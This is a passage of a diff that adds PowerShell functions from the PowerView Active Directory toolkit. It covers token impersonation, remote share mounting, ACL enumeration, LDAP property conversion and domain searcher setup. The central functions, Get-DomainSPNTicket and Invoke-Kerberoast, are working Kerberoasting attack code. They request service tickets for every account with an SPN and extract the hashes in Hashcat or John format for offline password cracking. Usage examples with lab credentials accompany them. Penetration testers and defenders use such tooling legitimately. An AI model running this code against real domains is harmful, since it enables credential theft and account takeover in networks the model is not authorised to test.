($TargetComputerName in $ComputerName) { + $TargetComputerName = $TargetComputerName.Trim('\') + $Paths += ,"\\$TargetComputerName\IPC$" + } + } + else { + $Paths += ,$Path + } + + ForEach ($TargetPath in $Paths) { + Write-Verbose "[Remove-RemoteConnection] Attempting to unmount: $TargetPath" + $Result = $Mpr::WNetCancelConnection2($TargetPath, 0, $True) + + if ($Result -eq 0) { + Write-Verbose "$TargetPath successfully ummounted" + } + else { + Throw "[Remove-RemoteConnection] error unmounting $TargetPath : $(([ComponentModel.Win32Exception]$Result).Message)" + } + } + } +} + + +function Invoke-UserImpersonation { +<# +.SYNOPSIS + +Creates a new "runas /netonly" type logon and impersonates the token. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +.DESCRIPTION + +This function uses LogonUser() with the LOGON32_LOGON_NEW_CREDENTIALS LogonType +to simulate "runas /netonly". The resulting token is then impersonated with +ImpersonateLoggedOnUser() and the token handle is returned for later usage +with Invoke-RevertToSelf. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object with alternate credentials +to impersonate in the current thread space. + +.PARAMETER TokenHandle + +An IntPtr TokenHandle returned by a previous Invoke-UserImpersonation. +If this is supplied, LogonUser() is skipped and only ImpersonateLoggedOnUser() +is executed. + +.PARAMETER Quiet + +Suppress any warnings about STA vs MTA. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Invoke-UserImpersonation -Credential $Cred + +.OUTPUTS + +IntPtr + +The TokenHandle result from LogonUser. +#> + + [OutputType([IntPtr])] + [CmdletBinding(DefaultParameterSetName = 'Credential')] + Param( + [Parameter(Mandatory = $True, ParameterSetName = 'Credential')] + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential, + + [Parameter(Mandatory = $True, ParameterSetName = 'TokenHandle')] + [ValidateNotNull()] + [IntPtr] + $TokenHandle, + + [Switch] + $Quiet + ) + + if (([System.Threading.Thread]::CurrentThread.GetApartmentState() -ne 'STA') -and (-not $PSBoundParameters['Quiet'])) { + Write-Warning "[Invoke-UserImpersonation] powershell.exe is not currently in a single-threaded apartment state, token impersonation may not work." + } + + if ($PSBoundParameters['TokenHandle']) { + $LogonTokenHandle = $TokenHandle + } + else { + $LogonTokenHandle = [IntPtr]::Zero + $NetworkCredential = $Credential.GetNetworkCredential() + $UserDomain = $NetworkCredential.Domain + $UserName = $NetworkCredential.UserName + Write-Warning "[Invoke-UserImpersonation] Executing LogonUser() with user: $($UserDomain)\$($UserName)" + + # LOGON32_LOGON_NEW_CREDENTIALS = 9, LOGON32_PROVIDER_WINNT50 = 3 + # this is to simulate "runas.exe /netonly" functionality + $Result = $Advapi32::LogonUser($UserName, $UserDomain, $NetworkCredential.Password, 9, 3, [ref]$LogonTokenHandle);$LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error(); + + if (-not $Result) { + throw "[Invoke-UserImpersonation] LogonUser() Error: $(([ComponentModel.Win32Exception] $LastError).Message)" + } + } + + # actually impersonate the token from LogonUser() + $Result = $Advapi32::ImpersonateLoggedOnUser($LogonTokenHandle) + + if (-not $Result) { + throw "[Invoke-UserImpersonation] ImpersonateLoggedOnUser() Error: $(([ComponentModel.Win32Exception] $LastError).Message)" + } + + Write-Verbose "[Invoke-UserImpersonation] Alternate credentials successfully impersonated" + $LogonTokenHandle +} + + +function Invoke-RevertToSelf { +<# +.SYNOPSIS + +Reverts any token impersonation. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +.DESCRIPTION + +This function uses RevertToSelf() to revert any impersonated tokens. +If -TokenHandle is passed (the token handle returned by Invoke-UserImpersonation), +CloseHandle() is used to close the opened handle. + +.PARAMETER TokenHandle + +An optional IntPtr TokenHandle returned by Invoke-UserImpersonation. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$Token = Invoke-UserImpersonation -Credential $Cred +Invoke-RevertToSelf -TokenHandle $Token +#> + + [CmdletBinding()] + Param( + [ValidateNotNull()] + [IntPtr] + $TokenHandle + ) + + if ($PSBoundParameters['TokenHandle']) { + Write-Warning "[Invoke-RevertToSelf] Reverting token impersonation and closing LogonUser() token handle" + $Result = $Kernel32::CloseHandle($TokenHandle) + } + + $Result = $Advapi32::RevertToSelf();$LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error(); + + if (-not $Result) { + throw "[Invoke-RevertToSelf] RevertToSelf() Error: $(([ComponentModel.Win32Exception] $LastError).Message)" + } + + Write-Verbose "[Invoke-RevertToSelf] Token impersonation successfully reverted" +} + + +function Get-DomainSPNTicket { +<# +.SYNOPSIS + +Request the kerberos ticket for a specified service principal name (SPN). + +Author: machosec, Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf + +.DESCRIPTION + +This function will either take one/more SPN strings, or one/more PowerView.User objects +(the output from Get-DomainUser) and will request a kerberos ticket for the given SPN +using System.IdentityModel.Tokens.KerberosRequestorSecurityToken. The encrypted +portion of the ticket is then extracted and output in either crackable John or Hashcat +format (deafult of Hashcat). + +.PARAMETER SPN + +Specifies the service principal name to request the ticket for. + +.PARAMETER User + +Specifies a PowerView.User object (result of Get-DomainUser) to request the ticket for. + +.PARAMETER OutputFormat + +Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format. +Defaults to 'John'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote domain using Invoke-UserImpersonation. + +.EXAMPLE + +Get-DomainSPNTicket -SPN "HTTP/web.testlab.local" + +Request a kerberos service ticket for the specified SPN. + +.EXAMPLE + +"HTTP/web1.testlab.local","HTTP/web2.testlab.local" | Get-DomainSPNTicket + +Request kerberos service tickets for all SPNs passed on the pipeline. + +.EXAMPLE + +Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat JTR + +Request kerberos service tickets for all users with non-null SPNs and output in JTR format. + +.INPUTS + +String + +Accepts one or more SPN strings on the pipeline with the RawSPN parameter set. + +.INPUTS + +PowerView.User + +Accepts one or more PowerView.User objects on the pipeline with the User parameter set. + +.OUTPUTS + +PowerView.SPNTicket + +Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section. +#> + + [OutputType('PowerView.SPNTicket')] + [CmdletBinding(DefaultParameterSetName = 'RawSPN')] + Param ( + [Parameter(Position = 0, ParameterSetName = 'RawSPN', Mandatory = $True, ValueFromPipeline = $True)] + [ValidatePattern('.*/.*')] + [Alias('ServicePrincipalName')] + [String[]] + $SPN, + + [Parameter(Position = 0, ParameterSetName = 'User', Mandatory = $True, ValueFromPipeline = $True)] + [ValidateScript({ $_.PSObject.TypeNames[0] -eq 'PowerView.User' })] + [Object[]] + $User, + + [ValidateSet('John', 'Hashcat')] + [Alias('Format')] + [String] + $OutputFormat = 'Hashcat', + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $Null = [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') + + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } + + PROCESS { + if ($PSBoundParameters['User']) { + $TargetObject = $User + } + else { + $TargetObject = $SPN + } + + ForEach ($Object in $TargetObject) { + if ($PSBoundParameters['User']) { + $UserSPN = $Object.ServicePrincipalName + $SamAccountName = $Object.SamAccountName + $DistinguishedName = $Object.DistinguishedName + } + else { + $UserSPN = $Object + $SamAccountName = 'UNKNOWN' + $DistinguishedName = 'UNKNOWN' + } + + # if a user has multiple SPNs we only take the first one otherwise the service ticket request fails miserably :) -@st3r30byt3 + if ($UserSPN -is [System.DirectoryServices.ResultPropertyValueCollection]) { + $UserSPN = $UserSPN[0] + } + + try { + $Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN + } + catch { + Write-Warning "[Get-DomainSPNTicket] Error requesting ticket for SPN '$UserSPN' from user '$DistinguishedName' : $_" + } + if ($Ticket) { + $TicketByteStream = $Ticket.GetRequest() + } + if ($TicketByteStream) { + $Out = New-Object PSObject + + $TicketHexStream = [System.BitConverter]::ToString($TicketByteStream) -replace '-' + + $Out | Add-Member Noteproperty 'SamAccountName' $SamAccountName + $Out | Add-Member Noteproperty 'DistinguishedName' $DistinguishedName + $Out | Add-Member Noteproperty 'ServicePrincipalName' $Ticket.ServicePrincipalName + + # TicketHexStream == GSS-API Frame (see https://tools.ietf.org/html/rfc4121#section-4.1) + # No easy way to parse ASN1, so we'll try some janky regex to parse the embedded KRB_AP_REQ.Ticket object + if($TicketHexStream -match 'a382....3082....A0030201(?..)A1.{1,4}.......A282(?....)........(?.+)') { + $Etype = [Convert]::ToByte( $Matches.EtypeLen, 16 ) + $CipherTextLen = [Convert]::ToUInt32($Matches.CipherTextLen, 16)-4 + $CipherText = $Matches.DataToEnd.Substring(0,$CipherTextLen*2) + + # Make sure the next field matches the beginning of the KRB_AP_REQ.Authenticator object + if($Matches.DataToEnd.Substring($CipherTextLen*2, 4) -ne 'A482') { + Write-Warning "Error parsing ciphertext for the SPN $($Ticket.ServicePrincipalName). Use the TicketByteHexStream field and extract the hash offline with Get-KerberoastHashFromAPReq" + $Hash = $null + $Out | Add-Member Noteproperty 'TicketByteHexStream' ([Bitconverter]::ToString($TicketByteStream).Replace('-','')) + } else { + $Hash = "$($CipherText.Substring(0,32))`$$($CipherText.Substring(32))" + $Out | Add-Member Noteproperty 'TicketByteHexStream' $null + } + } else { + Write-Warning "Unable to parse ticket structure for the SPN $($Ticket.ServicePrincipalName). Use the TicketByteHexStream field and extract the hash offline with Get-KerberoastHashFromAPReq" + $Hash = $null + $Out | Add-Member Noteproperty 'TicketByteHexStream' ([Bitconverter]::ToString($TicketByteStream).Replace('-','')) + } + + if($Hash) { + # JTR jumbo output format - $krb5tgs$SPN/machine.testlab.local:63386d22d359fe... + if ($OutputFormat -match 'John') { + $HashFormat = "`$krb5tgs`$$($Ticket.ServicePrincipalName):$Hash" + } + else { + if ($DistinguishedName -ne 'UNKNOWN') { + $UserDomain = $DistinguishedName.SubString($DistinguishedName.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + } + else { + $UserDomain = 'UNKNOWN' + } + + # hashcat output format - $krb5tgs$23$*user$realm$test/spn*$63386d22d359fe... + $HashFormat = "`$krb5tgs`$$($Etype)`$*$SamAccountName`$$UserDomain`$$($Ticket.ServicePrincipalName)*`$$Hash" + } + $Out | Add-Member Noteproperty 'Hash' $HashFormat + } + + $Out.PSObject.TypeNames.Insert(0, 'PowerView.SPNTicket') + $Out + } + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Invoke-Kerberoast { +<# +.SYNOPSIS + +Requests service tickets for kerberoast-able accounts and returns extracted ticket hashes. + +Author: Will Schroeder (@harmj0y), @machosec +License: BSD 3-Clause +Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, Get-DomainUser, Get-DomainSPNTicket + +.DESCRIPTION + +Uses Get-DomainUser to query for user accounts with non-null service principle +names (SPNs) and uses Get-SPNTicket to request/extract the crackable ticket information. +The ticket format can be specified with -OutputFormat . + +.PARAMETER Identity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER OutputFormat + +Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format. +Defaults to 'Hashcat'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Invoke-Kerberoast | fl + +Kerberoasts all found SPNs for the current domain, outputting to Hashcat format (default). + +.EXAMPLE + +Invoke-Kerberoast -Domain dev.testlab.local | fl + +Kerberoasts all found SPNs for the testlab.local domain, outputting to JTR +format instead of Hashcat. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -orce +$Cred = New-Object System.Management.Automation.PSCredential('TESTLB\dfm.a', $SecPassword) +Invoke-Kerberoast -Credential $Cred -Verbose -Domain testlab.local | fl + +Kerberoasts all found SPNs for the testlab.local domain using alternate credentials. + +.OUTPUTS + +PowerView.SPNTicket + +Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.SPNTicket')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [ValidateSet('John', 'Hashcat')] + [Alias('Format')] + [String] + $OutputFormat = 'Hashcat', + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $UserSearcherArguments = @{ + 'SPN' = $True + 'Properties' = 'samaccountname,distinguishedname,serviceprincipalname' + } + if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { $UserSearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential } + + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } + + PROCESS { + if ($PSBoundParameters['Identity']) { $UserSearcherArguments['Identity'] = $Identity } + Get-DomainUser @UserSearcherArguments | Where-Object {$_.samaccountname -ne 'krbtgt'} | Get-DomainSPNTicket -OutputFormat $OutputFormat + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Get-PathAcl { +<# +.SYNOPSIS + +Enumerates the ACL for a given file path. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertFrom-SID + +.DESCRIPTION + +Enumerates the ACL for a specified file/folder path, and translates +the access rules for each entry into readable formats. If -Credential is passed, +Add-RemoteConnection/Remove-RemoteConnection is used to temporarily map the remote share. + +.PARAMETER Path + +Specifies the local or remote path to enumerate the ACLs for. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target path. + +.EXAMPLE + +Get-PathAcl "\\SERVER\Share\" + +Returns ACLs for the given UNC share. + +.EXAMPLE + +gci .\test.txt | Get-PathAcl + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword) +Get-PathAcl -Path "\\SERVER\Share\" -Credential $Cred + +.INPUTS + +String + +One of more paths to enumerate ACLs for. + +.OUTPUTS + +PowerView.FileACL + +A custom object with the full path and associated ACL entries. + +.LINK + +https://support.microsoft.com/en-us/kb/305144 +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.FileACL')] + [CmdletBinding()] + Param( + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('FullName')] + [String[]] + $Path, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + + function Convert-FileRight { + # From Ansgar Wiechers at http://stackoverflow.com/questions/28029872/retrieving-security-descriptor-and-getting-number-for-filesystemrights + [CmdletBinding()] + Param( + [Int] + $FSR + ) + + $AccessMask = @{ + [uint32]'0x80000000' = 'GenericRead' + [uint32]'0x40000000' = 'GenericWrite' + [uint32]'0x20000000' = 'GenericExecute' + [uint32]'0x10000000' = 'GenericAll' + [uint32]'0x02000000' = 'MaximumAllowed' + [uint32]'0x01000000' = 'AccessSystemSecurity' + [uint32]'0x00100000' = 'Synchronize' + [uint32]'0x00080000' = 'WriteOwner' + [uint32]'0x00040000' = 'WriteDAC' + [uint32]'0x00020000' = 'ReadControl' + [uint32]'0x00010000' = 'Delete' + [uint32]'0x00000100' = 'WriteAttributes' + [uint32]'0x00000080' = 'ReadAttributes' + [uint32]'0x00000040' = 'DeleteChild' + [uint32]'0x00000020' = 'Execute/Traverse' + [uint32]'0x00000010' = 'WriteExtendedAttributes' + [uint32]'0x00000008' = 'ReadExtendedAttributes' + [uint32]'0x00000004' = 'AppendData/AddSubdirectory' + [uint32]'0x00000002' = 'WriteData/AddFile' + [uint32]'0x00000001' = 'ReadData/ListDirectory' + } + + $SimplePermissions = @{ + [uint32]'0x1f01ff' = 'FullControl' + [uint32]'0x0301bf' = 'Modify' + [uint32]'0x0200a9' = 'ReadAndExecute' + [uint32]'0x02019f' = 'ReadAndWrite' + [uint32]'0x020089' = 'Read' + [uint32]'0x000116' = 'Write' + } + + $Permissions = @() + + # get simple permission + $Permissions += $SimplePermissions.Keys | ForEach-Object { + if (($FSR -band $_) -eq $_) { + $SimplePermissions[$_] + $FSR = $FSR -band (-not $_) + } + } + + # get remaining extended permissions + $Permissions += $AccessMask.Keys | Where-Object { $FSR -band $_ } | ForEach-Object { $AccessMask[$_] } + ($Permissions | Where-Object {$_}) -join ',' + } + + $ConvertArguments = @{} + if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential } + + $MappedComputers = @{} + } + + PROCESS { + ForEach ($TargetPath in $Path) { + try { + if (($TargetPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) { + $HostComputer = (New-Object System.Uri($TargetPath)).Host + if (-not $MappedComputers[$HostComputer]) { + # map IPC$ to this computer if it's not already + Add-RemoteConnection -ComputerName $HostComputer -Credential $Credential + $MappedComputers[$HostComputer] = $True + } + } + + $ACL = Get-Acl -Path $TargetPath + + $ACL.GetAccessRules($True, $True, [System.Security.Principal.SecurityIdentifier]) | ForEach-Object { + $SID = $_.IdentityReference.Value + $Name = ConvertFrom-SID -ObjectSID $SID @ConvertArguments + + $Out = New-Object PSObject + $Out | Add-Member Noteproperty 'Path' $TargetPath + $Out | Add-Member Noteproperty 'FileSystemRights' (Convert-FileRight -FSR $_.FileSystemRights.value__) + $Out | Add-Member Noteproperty 'IdentityReference' $Name + $Out | Add-Member Noteproperty 'IdentitySID' $SID + $Out | Add-Member Noteproperty 'AccessControlType' $_.AccessControlType + $Out.PSObject.TypeNames.Insert(0, 'PowerView.FileACL') + $Out + } + } + catch { + Write-Verbose "[Get-PathAcl] error: $_" + } + } + } + + END { + # remove the IPC$ mappings + $MappedComputers.Keys | Remove-RemoteConnection + } +} + + +function Convert-LDAPProperty { +<# +.SYNOPSIS + +Helper that converts specific LDAP property result fields and outputs +a custom psobject. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +Converts a set of raw LDAP properties results from ADSI/LDAP searches +into a proper PSObject. Used by several of the Get-Domain* function. + +.PARAMETER Properties + +Properties object to extract out LDAP fields for display. + +.OUTPUTS + +System.Management.Automation.PSCustomObject + +A custom PSObject with LDAP hashtable properties translated. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('System.Management.Automation.PSCustomObject')] + [CmdletBinding()] + Param( + [Parameter(Mandatory = $True, ValueFromPipeline = $True)] + [ValidateNotNullOrEmpty()] + $Properties + ) + + $ObjectProperties = @{} + + $Properties.PropertyNames | ForEach-Object { + if ($_ -ne 'adspath') { + if (($_ -eq 'objectsid') -or ($_ -eq 'sidhistory')) { + # convert all listed sids (i.e. if multiple are listed in sidHistory) + $ObjectProperties[$_] = $Properties[$_] | ForEach-Object { (New-Object System.Security.Principal.SecurityIdentifier($_, 0)).Value } + } + elseif ($_ -eq 'grouptype') { + $ObjectProperties[$_] = $Properties[$_][0] -as $GroupTypeEnum + } + elseif ($_ -eq 'samaccounttype') { + $ObjectProperties[$_] = $Properties[$_][0] -as $SamAccountTypeEnum + } + elseif ($_ -eq 'objectguid') { + # convert the GUID to a string + $ObjectProperties[$_] = (New-Object Guid (,$Properties[$_][0])).Guid + } + elseif ($_ -eq 'useraccountcontrol') { + $ObjectProperties[$_] = $Properties[$_][0] -as $UACEnum + } + elseif ($_ -eq 'ntsecuritydescriptor') { + # $ObjectProperties[$_] = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0 + $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0 + if ($Descriptor.Owner) { + $ObjectProperties['Owner'] = $Descriptor.Owner + } + if ($Descriptor.Group) { + $ObjectProperties['Group'] = $Descriptor.Group + } + if ($Descriptor.DiscretionaryAcl) { + $ObjectProperties['DiscretionaryAcl'] = $Descriptor.DiscretionaryAcl + } + if ($Descriptor.SystemAcl) { + $ObjectProperties['SystemAcl'] = $Descriptor.SystemAcl + } + } + elseif ($_ -eq 'accountexpires') { + if ($Properties[$_][0] -gt [DateTime]::MaxValue.Ticks) { + $ObjectProperties[$_] = "NEVER" + } + else { + $ObjectProperties[$_] = [datetime]::fromfiletime($Properties[$_][0]) + } + } + elseif ( ($_ -eq 'lastlogon') -or ($_ -eq 'lastlogontimestamp') -or ($_ -eq 'pwdlastset') -or ($_ -eq 'lastlogoff') -or ($_ -eq 'badPasswordTime') ) { + # convert timestamps + if ($Properties[$_][0] -is [System.MarshalByRefObject]) { + # if we have a System.__ComObject + $Temp = $Properties[$_][0] + [Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null) + [Int32]$Low = $Temp.GetType().InvokeMember('LowPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null) + $ObjectProperties[$_] = ([datetime]::FromFileTime([Int64]("0x{0:x8}{1:x8}" -f $High, $Low))) + } + else { + # otherwise just a string + $ObjectProperties[$_] = ([datetime]::FromFileTime(($Properties[$_][0]))) + } + } + elseif ($Properties[$_][0] -is [System.MarshalByRefObject]) { + # try to convert misc com objects + $Prop = $Properties[$_] + try { + $Temp = $Prop[$_][0] + [Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null) + [Int32]$Low = $Temp.GetType().InvokeMember('LowPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null) + $ObjectProperties[$_] = [Int64]("0x{0:x8}{1:x8}" -f $High, $Low) + } + catch { + Write-Verbose "[Convert-LDAPProperty] error: $_" + $ObjectProperties[$_] = $Prop[$_] + } + } + elseif ($Properties[$_].count -eq 1) { + $ObjectProperties[$_] = $Properties[$_][0] + } + else { + $ObjectProperties[$_] = $Properties[$_] + } + } + } + try { + New-Object -TypeName PSObject -Property $ObjectProperties + } + catch { + Write-Warning "[Convert-LDAPProperty] Error parsing LDAP properties : $_" + } +} + + +######################################################## +# +# Domain info functions below. +# +######################################################## + +function Get-DomainSearcher { +<# +.SYNOPSIS + +Helper used by various functions that builds a custom AD searcher object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Domain + +.DESCRIPTION + +Takes a given domain and a number of customizations and returns a +System.DirectoryServices.DirectorySearcher object. This function is used +heavily by other LDAP/ADSI searcher functions (Verb-Domain*). + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER SearchBasePrefix + +Specifies a prefix for the LDAP search string (i.e. "CN=Sites,CN=Configuration"). + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to for the search. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainSearcher -Domain testlab.local + +Return a searcher for all objects in testlab.local. + +.EXAMPLE + +Get-DomainSearcher -Domain testlab.local -LDAPFilter '(samAccountType=805306368)' -Properties 'SamAccountName,lastlogon' + +Return a searcher for user objects in testlab.local and only return the SamAccountName and LastLogon properties. + +.EXAMPLE + +Get-DomainSearcher -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" + +Return a searcher that searches through the specific ADS/LDAP search base (i.e. OU). + +.OUTPUTS + +System.DirectoryServices.DirectorySearcher +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('System.DirectoryServices.DirectorySearcher')] + [CmdletBinding()] + Param( + [Parameter(ValueFromPipeline = $True)] + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [String] + $SearchBasePrefix, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit = 120, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + if ($PSBoundParameters['Domain']) { + $TargetDomain = $Domain + + if ($ENV:USERDNSDOMAIN -and ($ENV:USERDNSDOMAIN.Trim() -ne '')) { + # see if we can grab the user DNS logon domain from environment variables + $UserDomain = $ENV:USERDNSDOMAIN + if ($ENV:LOGONSERVER -and ($ENV:LOGONSERVER.Trim() -ne '') -and $UserDomain) { + $BindServer = "$($ENV:LOGONSERVER -replace '\\','').$UserDomain" + } + } + } + elseif ($PSBoundParameters['Credential']) { + # if not -Domain is specified, but -Credential is, try to retrieve the current domain name with Get-Domain + $DomainObject = Get-Domain -Credential $Credential + $BindServer = ($DomainObject.PdcRoleOwner).Name + $TargetDomain = $DomainObject.Name + } + elseif ($ENV:USERDNSDOMAIN -and ($ENV:USERDNSDOMAIN.Trim() -ne '')) { + # see if we can grab the user DNS logon domain from environment variables + $TargetDomain = $ENV:USERDNSDOMAIN + if ($ENV:LOGONSERVER -and ($ENV:LOGONSERVER.Trim() -ne '') -and $TargetDomain) { + $BindServer = "$($ENV:LOGONSERVER -replace '\\','').$TargetDomain" + } + } + else { + # otherwise, resort to Get-Domain to retrieve the current domain object + write-verbose "get-domain" + $DomainObject = Get-Domain + $BindServer = ($DomainObject.PdcRoleOwner).Name + $TargetDomain = $DomainObject.Name + 